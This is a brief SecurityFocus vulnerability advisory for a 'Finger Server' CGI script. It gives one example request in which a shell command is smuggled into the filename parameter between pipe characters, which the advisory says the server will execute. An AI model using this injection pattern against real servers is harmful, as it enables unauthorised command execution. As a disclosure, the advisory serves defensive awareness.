Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Finger Server Pipe Vulnerability

A request like:
http ://target/finger.cgi?action=archives&cmd=specific
&filename=99.10.28.15.23.username.|<shell command>|
(split for readability)
will cause the server to execute whatever command is specified.







 

Privacy Statement
Copyright 2009, SecurityFocus